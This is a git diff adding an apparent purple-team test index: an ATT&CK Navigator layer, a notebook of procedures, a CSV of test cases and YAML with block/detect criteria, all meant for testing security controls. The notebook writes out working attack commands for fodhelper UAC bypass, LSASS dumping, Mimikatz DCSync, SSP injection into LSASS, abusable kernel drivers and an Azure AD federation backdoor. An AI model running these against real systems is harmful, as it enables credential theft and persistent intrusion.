"techniqueID": "T1583.002" + }, + { + "enabled": false, + "techniqueID": "T1583.003" + }, + { + "enabled": false, + "techniqueID": "T1583.004" + }, + { + "enabled": false, + "techniqueID": "T1583.005" + }, + { + "enabled": false, + "techniqueID": "T1583.006" + }, + { + "enabled": false, + "techniqueID": "T1583.007" + }, + { + "enabled": false, + "techniqueID": "T1583.008" + }, + { + "enabled": false, + "techniqueID": "T1584" + }, + { + "enabled": false, + "techniqueID": "T1584.001" + }, + { + "enabled": false, + "techniqueID": "T1584.002" + }, + { + "enabled": false, + "techniqueID": "T1584.003" + }, + { + "enabled": false, + "techniqueID": "T1584.004" + }, + { + "enabled": false, + "techniqueID": "T1584.005" + }, + { + "enabled": false, + "techniqueID": "T1584.006" + }, + { + "enabled": false, + "techniqueID": "T1584.007" + }, + { + "enabled": false, + "techniqueID": "T1585" + }, + { + "enabled": false, + "techniqueID": "T1585.001" + }, + { + "enabled": false, + "techniqueID": "T1585.002" + }, + { + "enabled": false, + "techniqueID": "T1585.003" + }, + { + "enabled": false, + "techniqueID": "T1586" + }, + { + "enabled": false, + "techniqueID": "T1586.001" + }, + { + "enabled": false, + "techniqueID": "T1586.002" + }, + { + "enabled": false, + "techniqueID": "T1586.003" + }, + { + "enabled": false, + "techniqueID": "T1587" + }, + { + "enabled": false, + "techniqueID": "T1587.001" + }, + { + "enabled": false, + "techniqueID": "T1587.002" + }, + { + "enabled": false, + "techniqueID": "T1587.003" + }, + { + "enabled": false, + "techniqueID": "T1587.004" + }, + { + "enabled": false, + "techniqueID": "T1588" + }, + { + "enabled": false, + "techniqueID": "T1588.001" + }, + { + "enabled": false, + "techniqueID": "T1588.002" + }, + { + "enabled": false, + "techniqueID": "T1588.003" + }, + { + "enabled": false, + "techniqueID": "T1588.004" + }, + { + "enabled": false, + "techniqueID": "T1588.005" + }, + { + "enabled": false, + "techniqueID": "T1588.006" + }, + { + 
"enabled": false, + "techniqueID": "T1589" + }, + { + "enabled": false, + "techniqueID": "T1589.001" + }, + { + "enabled": false, + "techniqueID": "T1589.002" + }, + { + "enabled": false, + "techniqueID": "T1589.003" + }, + { + "enabled": false, + "techniqueID": "T1590" + }, + { + "enabled": false, + "techniqueID": "T1590.001" + }, + { + "enabled": false, + "techniqueID": "T1590.002" + }, + { + "enabled": false, + "techniqueID": "T1590.003" + }, + { + "enabled": false, + "techniqueID": "T1590.004" + }, + { + "enabled": false, + "techniqueID": "T1590.005" + }, + { + "enabled": false, + "techniqueID": "T1590.006" + }, + { + "enabled": false, + "techniqueID": "T1591" + }, + { + "enabled": false, + "techniqueID": "T1591.001" + }, + { + "enabled": false, + "techniqueID": "T1591.002" + }, + { + "enabled": false, + "techniqueID": "T1591.003" + }, + { + "enabled": false, + "techniqueID": "T1591.004" + }, + { + "enabled": false, + "techniqueID": "T1592" + }, + { + "enabled": false, + "techniqueID": "T1592.001" + }, + { + "enabled": false, + "techniqueID": "T1592.002" + }, + { + "enabled": false, + "techniqueID": "T1592.003" + }, + { + "enabled": false, + "techniqueID": "T1592.004" + }, + { + "enabled": false, + "techniqueID": "T1593" + }, + { + "enabled": false, + "techniqueID": "T1593.001" + }, + { + "enabled": false, + "techniqueID": "T1593.002" + }, + { + "enabled": false, + "techniqueID": "T1593.003" + }, + { + "enabled": false, + "techniqueID": "T1594" + }, + { + "enabled": false, + "techniqueID": "T1595" + }, + { + "enabled": false, + "techniqueID": "T1595.001" + }, + { + "enabled": false, + "techniqueID": "T1595.002" + }, + { + "enabled": false, + "techniqueID": "T1595.003" + }, + { + "enabled": false, + "techniqueID": "T1596" + }, + { + "enabled": false, + "techniqueID": "T1596.001" + }, + { + "enabled": false, + "techniqueID": "T1596.002" + }, + { + "enabled": false, + "techniqueID": "T1596.003" + }, + { + "enabled": false, + "techniqueID": "T1596.004" + }, + { + 
"enabled": false, + "techniqueID": "T1596.005" + }, + { + "enabled": false, + "techniqueID": "T1597" + }, + { + "enabled": false, + "techniqueID": "T1597.001" + }, + { + "enabled": false, + "techniqueID": "T1597.002" + }, + { + "enabled": false, + "techniqueID": "T1598" + }, + { + "enabled": false, + "techniqueID": "T1598.001" + }, + { + "enabled": false, + "techniqueID": "T1598.002" + }, + { + "enabled": false, + "techniqueID": "T1598.003" + }, + { + "enabled": false, + "techniqueID": "T1598.004" + }, + { + "enabled": false, + "techniqueID": "T1599" + }, + { + "enabled": false, + "techniqueID": "T1599.001" + }, + { + "enabled": false, + "techniqueID": "T1600" + }, + { + "enabled": false, + "techniqueID": "T1600.001" + }, + { + "enabled": false, + "techniqueID": "T1600.002" + }, + { + "enabled": false, + "techniqueID": "T1601" + }, + { + "enabled": false, + "techniqueID": "T1601.001" + }, + { + "enabled": false, + "techniqueID": "T1601.002" + }, + { + "enabled": false, + "techniqueID": "T1602" + }, + { + "enabled": false, + "techniqueID": "T1602.001" + }, + { + "enabled": false, + "techniqueID": "T1602.002" + }, + { + "enabled": false, + "techniqueID": "T1606" + }, + { + "enabled": false, + "techniqueID": "T1606.001" + }, + { + "enabled": false, + "techniqueID": "T1606.002" + }, + { + "enabled": false, + "techniqueID": "T1608" + }, + { + "enabled": false, + "techniqueID": "T1608.001" + }, + { + "enabled": false, + "techniqueID": "T1608.002" + }, + { + "enabled": false, + "techniqueID": "T1608.003" + }, + { + "enabled": false, + "techniqueID": "T1608.004" + }, + { + "enabled": false, + "techniqueID": "T1608.005" + }, + { + "enabled": false, + "techniqueID": "T1608.006" + }, + { + "enabled": false, + "techniqueID": "T1609" + }, + { + "enabled": false, + "techniqueID": "T1610" + }, + { + "enabled": false, + "techniqueID": "T1611" + }, + { + "enabled": false, + "techniqueID": "T1612" + }, + { + "enabled": false, + "techniqueID": "T1613" + }, + { + "enabled": false, + 
"techniqueID": "T1614" + }, + { + "enabled": false, + "techniqueID": "T1614.001" + }, + { + "enabled": false, + "techniqueID": "T1615" + }, + { + "enabled": false, + "techniqueID": "T1619" + }, + { + "enabled": false, + "techniqueID": "T1620" + }, + { + "color": "#7a34eb", + "techniqueID": "T1621" + }, + { + "enabled": false, + "techniqueID": "T1622" + }, + { + "enabled": false, + "techniqueID": "T1647" + }, + { + "enabled": false, + "techniqueID": "T1648" + }, + { + "enabled": false, + "techniqueID": "T1649" + }, + { + "enabled": false, + "techniqueID": "T1650" + }, + { + "enabled": false, + "techniqueID": "T1651" + }, + { + "enabled": false, + "techniqueID": "T1652" + }, + { + "enabled": false, + "techniqueID": "T1653" + }, + { + "enabled": false, + "techniqueID": "T1654" + }, + { + "enabled": false, + "techniqueID": "T1656" + }, + { + "enabled": false, + "techniqueID": "T1657" + }, + { + "enabled": false, + "techniqueID": "T1659" + } + ] +} \ No newline at end of file diff --git a/fs-index-2024/fs-index-2024-v1.0-notebook.md b/fs-index-2024/fs-index-2024-v1.0-notebook.md new file mode 100644 index 0000000..2ab367d --- /dev/null +++ b/fs-index-2024/fs-index-2024-v1.0-notebook.md 
@@ -0,0 +1,500 @@
+# General
+
+# Initial Access
+
+## Malicious ISOs - Generic ISO-wrapped payload
+
+ISO archives can be used to deliver malicious payloads while bypassing mark-of-the-web restrictions
+
+Use an ISO to deliver a malicious executable payload
+
+### Prerequisites
+
+1. Payload
+1. ISO containing the payload
+ 1. You can use `mkisofs` to create an ISO:
+ ```
+ bash> mkisofs -J -o {{ iso }} {{ payload }}
+ ```
+
+## MFA Push Spam - General guidance
+
+Push-based MFA systems are susceptible to abuse by attackers because they allow an attacker to send a large volume of MFA requests to a user in order to induce that user to accept the prompt in the hopes it ends the requests.
+
+Spam a target user with MFA approval prompts. Unlike a real-world scenario, this is not meant to test the human response to being inundated with MFA requests but rather the technical security controls for such a situation.
+
+### Guidance
+
+Send at least 10 MFA requests to the target user
+
+### Notes
+
+- If MFA is in place, but it does not use some form of zero-knowledge approval (e.g. push notification accept, SMS accept, etc), then it should be considered a block. For example, if the MFA systems requires entering a one-time code, then it would not be susceptible to this attack and therefore be blocked. If no MFA is enforced, it should be considered not blocked.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. 
For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+# Defense Evasion
+
+## Malicious kernel driver use - load known-abusable driver
+
+Kernel drivers can be used by attackers for a number of malicious activities, including hiding artifacts and tampering with endpoint security tools.
+
+This bypasses the need for attackers to retrieve legitimate code-signing certificates for a driver they wrote.
+
+### Prerequisites
+
+- Local admin
+- A known-abusable driver. Examples:
+ - **DBUtil_2_3 (SHA256 - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5)**
+ - RTCore64 (SHA256 - 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)
+ - IQVM64 (SHA256 - 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b)
+
+### Guidance
+
+Example loading using sc.exe
+
+```
+cmd> sc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\windows\System32\Drivers\{{ sys_file }} displayname= {{ name }}
+```
+
+### Cleanup
+
+- Is using sc.exe, stop and delete the service then restart the machine
+
+### Notes
+
+Drivers can be found in multiple places, including:
+
+- Directly from vendor sites
+- VirusTotal
+- Aggregators like LOLDrivers and KDU
+ - LOLDrivers: https://github.com/magicsword-io/LOLDrivers/tree/main/drivers
+ - KDU: https://github.com/hfiref0x/KDU/
+
+## UAC Bypass - via fodhelper.exe
+
+User Account Control is not a security control but can cause issues with execution when attempting privileged operations
+
+Move to a high-integrity execution context via fodhelper.exe and a Registry modification. Fodhelper.exe is one of many unpatched methods for bypassing UAC. 
+
+### Prerequisites
+
+- Split-token admin account
+
+### Guidance
+
+Check for the existence of the target registry key. If it exists, note the value so that it can be restored after execution.
+
+```
+cmd> reg query HKCU\Software\Classes\ms-settings\Shell\Open\command
+```
+
+Modify the registry key and execute fodhelper.exe to obtain an elevated command prompt:
+
+```
+cmd>
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+c:\windows\system32\fodhelper.exe
+```
+
+### Cleanup
+
+If the registry existed prior to execution, restore its value:
+
+```
+cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v {{ initial_command }} /f
+```
+
+Otherwise, delete the key:
+
+```
+cmd> reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+```
+
+### References
+
+- https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+- https://4pfsec.com/offensive-windows-fodhelper-exe/
+
+## DLL Side Loading - General guidance
+
+### Notes
+
+- For an up-to-date list of side-loadable DLLs, refer to https://hijacklibs.net/
+
+## DLL Search Order Hijacking - MpCmdRun.exe sideloading
+
+MpCmdRun.exe is susceptible to a DLL sideloading hijack via its dependency on MpClient.dll
+
+### Prerequisites
+
+- A DLL with the appropriate exports called `mpclient.dll`
+ - Use: https://github.com/2XXE-SRA/payload_resources/tree/master/dllsideload/mpclient
+
+### Guidance
+
+Copy `c:\program files\windows defender\mpcmdrun.exe` to the same directory as the `mpclient.dll` payload then run `mpcmdrun.exe`
+
+## Conditional Access Policy Modifications - General guidance
+
+### Notes
+
+- Create a new conditional access policy to avoid modifying production policies. Additionally, consider disabling the policy or setting it to report-only before modifying it. 
+
+# Discovery
+
+# Command and Control
+
+## Remote Assistance Software - General guidance
+
+Access via remote assistance software
+
+Select and use a well-known remote assistance software
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+ 1. TeamViewer: https://www.teamviewer.com/
+ 2. GoTo Resolve: https://www.goto.com/it-management/resolve
+ 3. ConnectWise Control: https://control.connectwise.com/
+
+### Notes
+
+- Where possible, use remote assistance software already in use in the environment
+
+## Remote tool download - General guidance
+
+Transfer tool into environment by downloading from the Internet
+
+### Notes
+
+- The maliciousness level of the binary should align with the intent of the test. For testing signature-based checks, use a known malicious tool, such as Mimikatz. For testing sandboxing or similar network security technologies, use an unknown yet still overtly malicious tool, such as one built around the current attack infrastructure. By default, start with the most malicious choice.
+
+## Web Service C2 - via Dropbox C3 channel
+
+Establish a command-and-control channel via a legitimate web service so that malicious traffic is masked
+
+Use C3's Dropbox channel for command-and-control
+
+### Prerequisites
+
+1. Install and run C3 on a server
+2. Create a Dropbox account
+3. Create a Dropbox developer app with read/write permissions then copy the access token
+4. Create a Dropbox channel in C3 using the app token
+5. Export a relay payload
+
+### Guidance
+
+Execute the relay payload
+
+### References
+
+1. 
Example of C3 using Dropbox: https://labs.withsecure.com/publications/attack-detection-fundamentals-c2-and-exfiltration-lab-3
+
+# Credential Access
+
+## LSASS dumping using comsvcs.dll - via rundll32.exe
+
+Use `rundll32.exe` to call the `MiniDump` export from `comsvcs.dll`
+
+### Prerequisites
+
+- Administrator rights
+- SeDebugPrivilege
+
+### Guidance
+
+```
+shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+```
+
+This command must be run from a shell process that has `SeDebugPrivilege` enabled.
+PowerShell should work to this end.
+
+You can acquire `SeDebugPrivilege` for `cmd.exe` by launching it as `SYSTEM` via Sysinternals' `PsExec` (`psexec -sid cmd`).
+Alternatively, you can use the VBScript file from `modexp`: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ (`cscript procdump.vbs lsass.exe`)
+
+### Cleanup
+
+- Delete the dump file
+
+## DCSync - via Mimikatz
+
+The DCSync attack mimics normal replication behavior between DCs, allowing for remote extraction of credentials
+
+Uses Mimikatz's lsadump::dcsync command
+
+### Prerequisites
+
+- Command execution in the context of an account with Active Directory replication rights
+- User accounts to target
+- Mimikatz binary (https://github.com/gentilkiwi/mimikatz)
+
+### Guidance
+
+```
+mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ target_username }}
+```
+
+### Troubleshooting
+
+If Mimikatz is giving an error of `ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)`, try the following:
+
+```
+cmd> klist purge
+cmd> gpupdate /force
+```
+
+## LSASS Security Service Provider - Temporary SSP
+
+Register a Security Service Provider (SSP) for LSASS. This will trigger a DLL load of the SSP into LSASS.
+
+Register an SSP temporarily by calling the AddSecurityPackage() API.
+
+### Prerequisites
+
+- Local administrator
+- A compiled SSP DLL and a method of calling the AddSecurityPackage() API (e.g. 
custom exe payload)
+ - SSP source: https://github.com/2XXE-SRA/payload_resources/blob/master/c/lsa_ssp.c
+ - This can be compiled using MinGW via `x86_64-w64-mingw32-gcc -shared -municode -o ssp.dll lsa_ssp.c -lsecur32`
+ - SSP loader: https://github.com/2XXE-SRA/payload_resources/blob/master/powershell/ssp_loader.ps1
+
+### Guidance
+
+Open an administrative PowerShell terminal.
+
+If using the script linked above, run the following command
+
+```
+PS> .\ssp_loader.ps1 {{ ssp_dll_path }}
+```
+
+If loading manually, first set the path to the compiled SSP DLL into a variable
+
+```
+PS> $DllName = "{{ ssp_dll_path }}"
+```
+
+Then load the SSP into LSASS
+
+```
+PS>
+$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
+$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)
+
+$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',
+ 'secur32.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([String], [IntPtr]),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+$Secur32 = $TypeBuilder.CreateType()
+
+if ([IntPtr]::Size -eq 4) {
+ $StructSize = 20
+} else {
+ $StructSize = 24
+}
+
+$StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)
+[Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)
+
+$Secur32::AddSecurityPackage($DllName, $StructPtr)
+```
+
+### Cleanup
+
+- The SSP will be removed on system reboot or after manually calling DeleteSecurityPackage()
+
+### References
+
+- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+
+# Impact 
+
+## GPO Modifications - General guidance
+
+### Notes
+
+- Create a new group policy object to avoid modifying production policies. Additionally, consider disabling the policy before modifying it.
+
+# Lateral Movement
+
+# Persistence
+
+## Scheduled Task Persistence - via schtasks.exe
+
+Use built-in schtasks.exe to persist by creating a scheduled task
+
+### Guidance
+
+```
+CMD> schtasks /Create /SC DAILY /TN "{{ taskname }}" /TR "{{ command }}" /ST 09:00
+```
+
+### Cleanup
+
+```
+CMD> schtasks /delete /tn "{{ taskname }}" /f
+```
+
+## Windows Service Persistence - via sc.exe
+
+Use built-in sc.exe to persist
+
+### Guidance
+
+```
+CMD> sc create {{ service_name }} binPath= "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> sc delete {{ service_name }}
+```
+
+## Persistence in Azure AD - Register a New Device
+
+Register a new device in Azure AD
+
+### Prerequisites
+
+- Azure AD credentials
+- AAD Internals PowerShell module (https://aadinternals.com/aadinternals/#installation)
+ - Install: `PS> install-module aadinternals -scope currentuser`
+ - Import: `PS> import-module aadinternals`
+
+### Guidance
+
+Authenticate to Azure AD and save the token
+
+```
+PS> Get-AADIntAccessTokenForAADJoin -SaveToCache
+```
+
+Register a device:
+
+```
+PS> Join-AADIntDeviceToAzureAD -DeviceName "{{ device_name }}" -DeviceType "{{ device_type }}" -OSVersion "{{ os_version }}" -JoinType Register
+```
+
+ - This will save a `.pfx` certificate to the current working directory, which is needed for cleanup
+ - Note: The provided values do not need to refer to real characteristics
+
+### Cleanup
+
+Remove the device from Azure AD
+
+```
+PS> Remove-AADIntDeviceFromAzureAD -PfxFileName {{ pfx_certificate_file }}
+```
+
+## Azure AD Domain Federation - Backdoor via AADInternals
+
+Use AADInternals to create a backdoor federation domain for persisting access to an environment. 
+
+### Prerequisites
+
+- Permissions to modify domain authentication settings
+ - and an access token for the user with these permissions, referred to as `$at` in example commands. To retrieve a token, use `$at=Get-AADIntAccessTokenForAADGraph -Credentials (get-credential)` and proceed through the prompts
+- AADInternals installed
+ - `Install-Module AADInternals`
+- A target verified domain in Azure AD
+ - To add a domain, Go to Azure AD -> custom domain names -> add -> set the provided DNS records for your domain -> wait for the verification to compelete
+- A user with an immutable ID set
+ - To set an immutable ID for a user: `Set-AADIntUser -UserPrincipalName {{ upn_or_email }} -ImmutableId "{{ id }}" -AccessToken $at` where the `id` is an arbitrary unnique value
+
+### Guidance
+
+To set the backdoor
+
+```
+PS> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "{{ domain }}"
+```
+
+To use the backdoor. This works for any user in the tenant, regardless of their domain.
+
+```
+Open-AADIntOffice365Portal -ImmutableID {{ id }} -UseBuiltInCertificate -ByPassMFA $true -Issuer {{ issuer }}
+```
+
+- `id` is the immutable ID of the target user
+- `issuer` is the IssuerUri provided in the output of the previous command
+
+### Cleanup
+
+- Delete the domain
+
+### Notes
+
+- The domain must be verified for the backdoor to work
+
+### References
+
+- https://o365blog.com/post/aadbackdoor/
+- https://www.mandiant.com/resources/blog/detecting-microsoft-365-azure-active-directory-backdoors
+
+# Exfiltration
+
+## DLP Test - General use
+
+DLP Test (dlptest.com) is a web utility for testing if exfiltration of sensitive data is successful
+
+General usage notes for DLP Test
+
+### Notes
+
+- If sample sensitive data is needed, the site provides it in different types and formats
+- The site supports HTTP, HTTPS, and FTP
+- Do not upload actual sensitive data to the site
+
+## Exfiltration to cloud storage - General guidance
+
+Select and use a well-known cloud storage 
service
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+ 1. Generic: https://rclone.org/downloads/
+ 2. MEGA: https://mega.io/desktop
+ 3. Dropbox: https://www.dropbox.com/install
+
+### Notes
+
+- Where possible, use cloud storage service already in use in the environment
+
+# Execution
+
+# Collection
+
diff --git a/fs-index-2024/fs-index-2024-v1.0-summary.csv b/fs-index-2024/fs-index-2024-v1.0-summary.csv
new file mode 100644
index 0000000..726da0f
--- /dev/null
+++ b/fs-index-2024/fs-index-2024-v1.0-summary.csv
@@ -0,0 +1,51 @@
+"Test Case","MITRE ID","Campaign","Description"
+"Attachment - ISO","T1566.001","Initial Access","Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions."
+"Attachment - Zipped macro","T1566.001","Initial Access","Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email."
+"Prompt a user with multiple MFA requests","T1621","Initial Access","Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt."
+"External employee portal spray","T1110.003","Initial Access","Perform a password spray against an external employee login portal using a list of potential users and a single password"
+"Suspicious external employee login","T1078","Initial Access","Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt."
+"Suspicious service use","T1078","Initial Access","Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service."
+"Clear Windows Event Log entries","T1070.001","Defense Evasion","Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs."
+"Load known-abusable kernel driver","T1014","Defense Evasion","Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes."
+"DLL execution using Rundll32","T1218.011","Defense Evasion","Execute a malicious DLL's function directly using rundll32"
+"Bypass User Account Control (UAC) via fodhelper","T1548.002","Defense Evasion","Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification"
+"Sideload a DLL into a legitimate application","T1574.002","Defense Evasion","Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application."
+"Disable Windows Defender via PowerShell","T1562.001","Defense Evasion","Use PowerShell's Set-MpPreference to disable Windows Defender"
+"Modify identity policy in IdP","T1484","Defense Evasion","Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement."
+"Domain Controller discovery via nltest","T1018","Discovery","Use nltest.exe to identify domain controllers in the domain"
+"Domain trust discovery via nltest","T1482","Discovery","Identify domain trust relationships using nltest.exe"
+"Enumerate domain groups and users using net","T1087.002","Discovery","Enumerate domain users and domain groups using the builtin net.exe"
+"BloodHound DC enumeration","T1087.002","Discovery","Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller"
+"Internal network scan using Net Scan","T1046","Discovery","Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect"
+"Retrieve system information","T1082","Discovery","Retrieve information about the system using multiple builtin commands"
+"HTTP C2 over tcp/80","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP"
+"HTTPS C2 over tcp/443","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS"
+"Access via remote assistance tool","T1219","Command and Control","Establish connection to system using a legitimate remote assistance application"
+"Remote tool download over HTTP","T1105","Command and Control","Download a tool from a public hosting location onto the victim system"
+"C2 over Dropbox","T1102.002","Command and Control","Establish a command-and-control connection from a managed asset to an external server on the Internet by tunneling the traffic through Dropbox. This will masquerade the command-and-control traffic as legitimate application traffic."
+"Extract Logonpasswords via Nanodump","T1003.001","Credential Access","Use nanodump to extract credentials from LSASS process memory"
+"Dump LSASS memory using builtin comsvcs.dll","T1003.001","Credential Access","Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk"
+"Dump LSASS memory using Sysinternals ProcDump","T1003.001","Credential Access","Use ProcDump from Sysinternals to dump LSASS process memory"
+"Volumetric Kerberoasting","T1558.003","Credential Access","Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set"
+"Extract browser cookies","T1555.003","Credential Access","Extract cookie information from the user's browser"
+"Extract domain user credentials via replication","T1003.006","Credential Access","Replicate a user's hash from a domain controller using replication APIs (DCSync)."
+"Register Security Service Provider (SSP) in LSASS","T1547.005","Credential Access","Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS."
+"Enabled WDigest via Registry","T1112","Credential Access","Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory"
+"Delete shadows with vssadmin.exe","T1490","Impact","Delete volume shadow copies on the host to inhibit file system recovery"
+"Encrypt a large amount of files","T1486","Impact","Encrypt a large amount of files on the endpoint to simulate ransomware"
+"Modify group policy object","T1484.001","Impact","Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems."
+"Lateral Movement via RDP","T1021.001","Lateral Movement","Perform an interactive logons to a Windows system via RDP"
+"Lateral Movement via PsExec","T1021.002","Lateral Movement","Move to another system by creating a service remotely via Sysinternals PsExec"
+"Lateral Movement via WMI","T1021.003","Lateral Movement","Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system"
+"Remote .exe copy","T1570","Lateral Movement","Copy an .exe payload to a temp folder on the remote target"
+"Persist via new scheduled task","T1053.005","Persistence","Persist on a system by creating a new scheduled task"
+"Persist via new Windows service","T1543.003","Persistence","Persist on a system by creating a new service"
+"Persist via Registry Winlogon Shell","T1547.004","Persistence","Run a payload during user login by setting a Registry Winlogon key"
+"Register a new device in Azure AD","T1098.005","Persistence","Register a new device in Azure AD"
+"Configure a custom federated domain","T1484.002","Persistence","Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant."
+"Extract sensitive data over HTTP","T1048.003","Exfiltration","Extract data from the network over HTTP tcp/80 to an external host or IP."
+"Extract data to cloud storage service","T1567.002","Exfiltration","Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box"
+"Extract sensitive data over HTTP C2","T1041","Exfiltration","Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP"
+"Macro - Remote Template","T1221","Execution","Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document"
+"Screen Capture","T1113","Collection","Capture an image of the user's screen"
+"Keylogger","T1056.001","Collection","Log user keystrokes"
diff --git a/fs-index-2024/fs-index-2024-v1.0.yml b/fs-index-2024/fs-index-2024-v1.0.yml
new file mode 100644
index 0000000..9d2fecf
--- /dev/null
+++ b/fs-index-2024/fs-index-2024-v1.0.yml
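Review bot: The `Campaign` column is easy to misread as the ATT&CK tactic, and for several rows it disagrees with the `tactic` id the companion YAML carries for the same test: `T1621` and `T1110.003` are filed under `Initial Access` here but `tactic: TA0006` in the YAML, and `Modify identity policy in IdP` is `Defense Evasion` here but `tactic: TA0003` there. Consider adding a `Tactic` column populated from `metadata.tactic` (or stating in the README that Campaign is the test grouping rather than the MITRE tactic) so the summary can be consumed, e.g. for a Navigator layer, without cross-referencing the YAML. Rows are also only joinable back to YAML entries by free-text `Test Case` name; carrying `metadata.id` as a column would survive renames. Separately, `Register an SSP DLL that into LSASS.` has a dropped word and `Perform an interactive logons` should be singular; both strings also appear in the YAML, so fix them in both or in whatever generates this file.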
@@ -0,0 +1,1022 @@ +Initial Access: +- name: Attachment - ISO + description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions. + platforms: + guidance: + - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }} + block: + - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway + detect: + - Malicious email alerted on by email gateway + controls: + - Mail Gateway + metadata: + id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658 + tid: T1566.001 + tactic: TA0001 + x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658 + isv: 1 +- name: Attachment - Zipped macro + description: Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email. + platforms: + guidance: + - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }} + block: + - Malicious email blocked/quarantined or attachment inside email stripped by email gateway + detect: + - Malicious email alerted on by email gateway + controls: + - Mail Gateway + metadata: + id: 97f1da56-79a3-4181-a491-8de9f93b05af + tid: T1566.001 + tactic: TA0001 + x_vectr_id: 97f1da56-79a3-4181-a491-8de9f93b05af + isv: 1 +- name: Prompt a user with multiple MFA requests + description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt. 
